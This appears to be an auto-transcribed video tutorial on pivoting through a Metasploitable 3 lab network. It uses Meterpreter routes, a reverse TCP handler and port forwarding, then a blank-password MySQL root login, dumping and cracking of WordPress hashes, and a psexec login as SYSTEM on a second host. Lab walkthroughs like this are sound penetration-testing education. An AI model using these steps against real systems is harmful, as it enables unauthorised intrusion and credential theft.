Welcome back. In this video, we're going to carry on what we have done in the last video with Metasploitable 3. Now, if you remember, we have got privileged session. This is the session that we have got, which is net authority by exploiting or by uploading a payload on Tomcat server, which gave us the interpreter connection back. Now, if we interact with the session, sessions-i1, get UID, we are a system, right? That's what we have done in the last video. Now, we're going to explore the network which the target sits on, and we're going to see if there is other network that the target is connected to. So what we're going to do here, we're going to type if config to discover and find out the network adapters. So we have here a couple of network adapters. We have the one which is connected to the VirtualBox. We have another one right here, interface 19, which is, as you can see, desktop adapter 2, and the IP is 192.168.56.101. But as you know, we can't reach that IP if we don't have a route to that network. So we have two scenarios. We either set up an SSH tunnel to that route, or we use the available modules in Metasploit. Now, for saving time, we can use the available modules in Metasploit. So what we're going to do here, we're going to background. We're going to search name. What was the name? Auto route. Or let me type route. Okay, so I've got many ones. So here, this is the one, I think, post multi-managed auto route, but there is another one which, all right, seems that this is the one. Okay, now let's use this module to add an auto route to the network we have just discovered. So use show options. Let's see what are the required options. So here, we're gonna need to set the session and the subnet, right? So basically, we're gonna set the sessions, session 1, and the subnets. I'm not sure. Let me go back to the session, sessions-i1, if config. So this is the IP netmask. Okay, so the network IP will be 192.168.56.0. Background. Show options. So set subnet 192.168.56.1.0 here. So we're going to run. So we have added the route to this network, which means we can now scan this target, right, with no connection problems. So right now we can achieve the pivoting and find out what is running in there, so we can start the enumeration, the exploitation, the privilege escalation, etc. So now we're gonna search for port scanning, or we're gonna use Nmap directly. So okay, let's go scan the port first. Name, port, scan. Okay. Port. Oh, that's not good. That's not good at all. Let me go back to my manual and see here. What do I have on this? So port scan, it was somewhere. Okay. All right, so this is the module. Let's take it. Use. Oh, then you remove that one. Show options. All right, let's set our hosts to the one that we have just found. So let's go up. This is very problematic. Let's go up, up, up. Okay. Take that and go down. Go down. Okay, now here we see the range of ports, right? So it's set from 1 to 10,000. So that's okay, but it may take some time if you are okay with waiting. So run, let's scan the target and see what's in there. So we have 22, we have 21. Oh, session died. Okay, no problem. Sessions -I, no active sessions. Okay, previous. Okay, use multi exploit multi handler set. What happens? Exploit multi handler. Yeah. Set payload Windows return reverse TCP set lhost 192.168.1.7 set lport 4545 set auto run script host Windows manage migrate to avoid the session dies issues. And we're gonna run. Let's go back and trigger the payload. Specified interpreter session script could not be found. Yeah, fuck my titles. So I typed manager instead of that. So, okay, no problem. We're gonna correct that if we lose the session. Right now, let's background and let's go to previous. Show options. Let's make sure the route is okay. All right. So right now, use. Let's go back, take the scanner. Show options. So the options are still. All right, run. Seems like the IP has changed since we have got the new session. Let's make sure the IP hasn't changed. So sessions -i2 if config. So it has changed 56. I'm not sure. Let's go up. No, it's the same. All right. A background. Okay. Show options. Previous run. Ah, the session variable is missed. Okay, set session 2 run. All right, previous. Let's run this now. Run report scan. So we got, again, it has died. All right. All right. Fair enough. Fair enough. I'm lost a bit. Let's use the handler again. Set payload. Let's trigger that damn exploit again. Go back. Okay. New session has arrived, and now the migration should be done. All right, so I hope that this migration stuff will solve our problem. Now we need to um, keep going. So background, previous. All right. Now we need to find the auto route stuff. So here, go down. Let's take that. I don't know what's this. What's it with me with the word manager? Use post Windows manage auto route. Auto route. Failed to load the module. Jesus. Search type name route. Okay. Now let me correct it, of course, on my end. So here it's going to be paste. Highlight this. Save. Okay, let's resume. Here set session 3. Show options. All right, run. Now let's go to scanning the ports. Previous. Switching between these two. Okay. Let's find it from here. I don't like to memorize the modules. Port scanning. Let's take it. Paste. Show options. Okay, run. '22, '21. So since the remote host has got so many open ports, it took substantial amount of time to discover these ports. And then the session died. So I decided that we will proceed further with Nmap to scan the host, right? So here we got some open ports on the remote host. So what I'm gonna do here, I'm gonna scroll down. I'm gonna type db nmap and scan my target. So basically here, let's go up and find the IP was something like, I don't like this. All right, so here is the IP. Let's take that. And I'm not going to run the Nmap scan on all of the ports. It's going to take substantial amount of time. So you can run it on your own and find out. So I'm going to run that on specific ports for the demonstration of this video. So you see here we have port 3306, right? So this is for the MySQL. So if we go down, we type here db nmap. Stop doing that. Okay. Nmap Nmap, and here we type the ports, which is 3306, and the switch-sv and the IP address. Let's do that. So here we are scanning only the port 3306 to find out. So it's so here the IP is wrong. Paste. Okay, let's try /bn. All right, so it's saying that this IP address on that subnet has MySQL on this port, but it's showing filtered, right? So we can use some other switch. So instead of V, we're going to use S. Oh my God, we are not running MSF console as sudo, so it's not running the stealth scan. So here we can choose SV and SC. It's still showing filtered. All right. But we know from the previous scan that this port is open. So what we're gonna do now, we're gonna try and log in to the MySQL server. But in order to log in to MySQL server, we need to be able to interact with the target. Since the target sits on an entirely different subnet, right? So we need something like proxy chains, right? So that's why here, if we go up, this is the module in Metasploit where we set the proxy chains, the socks for proxy. So here we take that and we go back, we use here. All right, so server socks for A, show options. So we got the server port on 8080. We can run that and split horizontally, and we make sure that the proxy chains.conf has the configuration set up. Kali rolling. Go down. So here I have set the proxy chains SOX4 to my local IP and the port 8080. So here, what we're going to do now, we're going to try to interact with the MySQL server. So search, type or name MySQL. Okay. So here we have got some exploits. So we're going to try. All right, let's see what we got here. Let's use that, the scanner login utility, and try to log into the MySQL server. Show options. Okay, so here we need some options set. Blank passwords required. So the username needs to be, okay, let's set the rhosts and let's leave the username as it is. Set rhosts. The rhost is the IP address of the machine on the other subnet. So where was the IP? Go down, set. Let's run. Let's see if we can log in with the default username and password. So the default credentials worked. As you can see, root with a blank password. And we were able to log in, right? Therefore, we're going to now use other modules that exploit the MySQL database, and who knows, we might be able to dump the credentials server now, but it's going to stop, I think. Yeah, it has stopped. I tried this before. For unknown reason, I cannot get the SOCs for a server running on Metasploit. So for that purpose, I cannot proceed with proxy chains here. That is why, instead of adding the proxy now, we're going to use another command, which is port forwarding. So let's go back to my manual and find this command here. Okay. So where was it? Okay, this is it. Let's copy that and paste it. So instead of that, we're going to use the IP address of the target, which was, let's go to the browser. I think it was here. All right, let's take that and go back, paste. Of course, we're going to cancel the protocol characters. All right, so here I added the port forwarding option to forward or to establish some kind of channel between me and the remote host on this port. Since this is the port of the MySQL server we have seen before, that is why I need to do port forwarding in order to connect to that port on my local machine. So here, let me press enter. Unknown command. Oh, I'm doing that on the Metaslpoitable console. All right, let's do it on the host. So sudo So for that reason, I'm going to use port forwarding here. I'm going to grab the command and go to sessions here, re-interact with the session to add the forward. So here, sessions dash I4. Okay, let's paste that. So we have created now the port forwarding to the MySQL server, right, on port 3306 on the remote IP that exists on the faraway subnet, right? Now we can interact with the MySQL server here locally on our machine, luckily. So MySQL or sudo MySQL-u root, and here we're going to type the IP. Of course, there are a bunch of ways to do port forwarding. The available one for this video is the port forward command, not the SSH. Cannot connect through sockets. Okay. Oh, so here the host will be our local host. So here it's going to be -h132.0.0.1. Let's try this. All right, so we have successfully connected to the MySQL server. Now note that this MySQL server exists on that IP, right? Okay. Now, what we need to do now is to dump the credentials, right? So we can type databases. Database. Oh, show database. Okay, sorry. So we have information schema, cards, MySQL, test, WordPress. So the one I'm interested in actually is the WordPress one. So I'm going to be issuing some commands to dump the credentials from the WordPress database. So select the user login, and here user pass from WP users. Oh, select. Now we're gonna use WordPress. Sorry. Okay, now we can paste that. So we got now the credentials dumped from the database, right? So I have admin, vagrant, user, manager. Now we can take these password hashes and crack them using John the Ripper, right? So we're gonna do another split, vertical, horizontal, vertical. Okay. So here we can touch or nano hashes.txt, and we can take this one per line, and crack them. Let's copy the last one. Now sudo john dash wordlist equal user share wordlists rock u dot txt hashes txt. When you press enter, you're going to be able to crack the passwords. Now it's going to take some time. I'm not going to run that. The password for the admin is exploit, and the password for vagrant is vagrant. Now, after we have got the passwords of the WordPress database, we can log in now to WordPress, right, and get reverse shell. But we need first to create remote port forwarding to that port, right? So we can issue another command here. So 306, it's going to be 5, and here port 80. Right? So right now we're creating a port forward rule to forward our connections, every connection to port 80, right, on this machine to be forwarded on our machine on that port. So right now, let's try to browse to the port here. So I'm going to type 17. What was the port? 3305. And we weren't able to connect. Let me check the proxy servers if there is any rules that I have forgot. Oh, no proxy. Run. We got some problems. Let me type 80. Oh, no luck. Let's go back and find out more about this. So here we got, oh, we haven't entered all right. So enter. Now let's go back. 3305. And as you can see, we are able to access the web page of that remote host. So what was this? Let me type here wp-admin, server error in application. Oh, so it could be WordPress. Physical path. Let's go back. View page source. haha.jpg. Okay. So this is kind of there is a hint for this, I guess. I haven't done that before. Let's go back and find out more. So here it's saying that we have a WordPress running, right? So we need actually to do Nmap scanning on that target. So that's why we need to identify on which port the WordPress installation is running. And for that to be done, we need to scan again in Metapreter here. So basically, we can run dp nmap again, and the IP address and find out where is WordPress running on which port. So it seems that on port 8 there is no WordPress installation, right? So we need to look for the WordPress installation. That's why we need to issue the Nmap scanning again. It's going to take some time. So, but I remember where the port is, so we can go back and type here. Or let's go back again. It is on ports. Oh, sorry. It is on port 8484, I guess. So here, we need first to create the forward. So here we create another port forward rule here. Let's take this. And this time it's going to be on the port where the WordPress is running. So basically here the WordPress port is 8484. I'm going to select here 7. Let's go back and access the WordPress installation now. Let's replace this with 7. And hopefully this is Jenkins, so it could be on other port. Let's go back and it could be on port 8585, right? So here let's change that to 5, and here do some 9, let's say. Go back and change this to 9. And here we put /WordPress. So it could be the WordPress running on. All right, we change this to again 3309, 3309. So I can't access WordPress for some reason. It's insisting that I accessed on port 8585, and I can't access that port without this one. So it seems that we will not be able to access the WordPress since the link, this link here, let's inspect the elements and see the hyperlink. WordPress. Okay. So this link here, copy link. So when I enter, it's showing me that I'm accessing the port 8585, of course, which is not accessible unless I access the port that is forwarding to, which is 3309. Let me try between my admin. All right. Okay, this is forbidden. What about PHP info? So PHP info has worked, and we can see the PHP version, which is 5.3.10. Okay, but why I can't access the WordPress? That is the mysterious thing. All right, so it seems that there is some glitch here preventing me from accessing the WordPress and logging in with the credentials that we have just found. So basically, we're going to look for another way to harvest or to harness the credentials that we have just found here. So let's put background and try to log in to the remote host. So basically, we're going to type search, type ps name, psexec. So let's log in now with psexec here. Show options. All right. No, this is required. Authenticate via purpose. Don't resolve host names. Okay, the R hosts and this session. Okay, I'm going to set the R host then. R hosts to be what was that? What was the R host? The IP. Okay, let's take that, go down, and set session. It was 4 or 5, 4, and we need the username and password now. All right, run. All right, it didn't work on the Metasploit, so we can run this here, but we need first to create another port forwarding rule. So we go up, we find the command for port forwarding. Okay, let me grab it from here. Okay, so right now, here we put the IP of the target, which is this one. And then instead of 3306, the port on which psexec runs on is 445. And in my case, I'm going to put the same 445. Oh, we need to run this on Meterpreter. Yeah, okay. Sessions-i4. Are we using this port? 446. All right, I know. That's why. We use something like, let's see, 1122. All right, now let's try to log in to the remote host with psexec.py here. And we're going to use we can use one of these actually to log in. I'm going to use Vagrant. So here we define the username. And the IP will be localhost, right? Since we have done the port forwarding, it's going to be localhost. And the password is Vagrant, the same. And we have successfully logged in to the remote host. Let's find who we are. Who am I? And we are Net Authority System. So basically what we have been able in this video to pivot to a network connected to the targets. And I mean, and we are system here, as you can see. So in this video, we were able to step through many hosts on the network. We started with the original host, which we have the Meterpreter session on, and then we found another host located on the IP address we have scanned with Meterpreter. We added port forwarding rules in order to enumerate that target, and successfully we were able to grab the credentials of the MySQL database, and we used these credentials to log into the target host. And fortunately for us, we were able to grab privileged connection. So you're a system now. In this video, we conclude the Windows system on the Metaslpoitable 3. If you want to check my last video, we had some fun with the Tomcat server and the Jenkins server. We were able to grab privileged shell on the Windows box of Metaslpoitable 3. But in this video, we were able to do pivoting on the network. We have found another Windows system, or Windows Server system running, which is this one, or the one we have logged into. All right then, see you in the next video.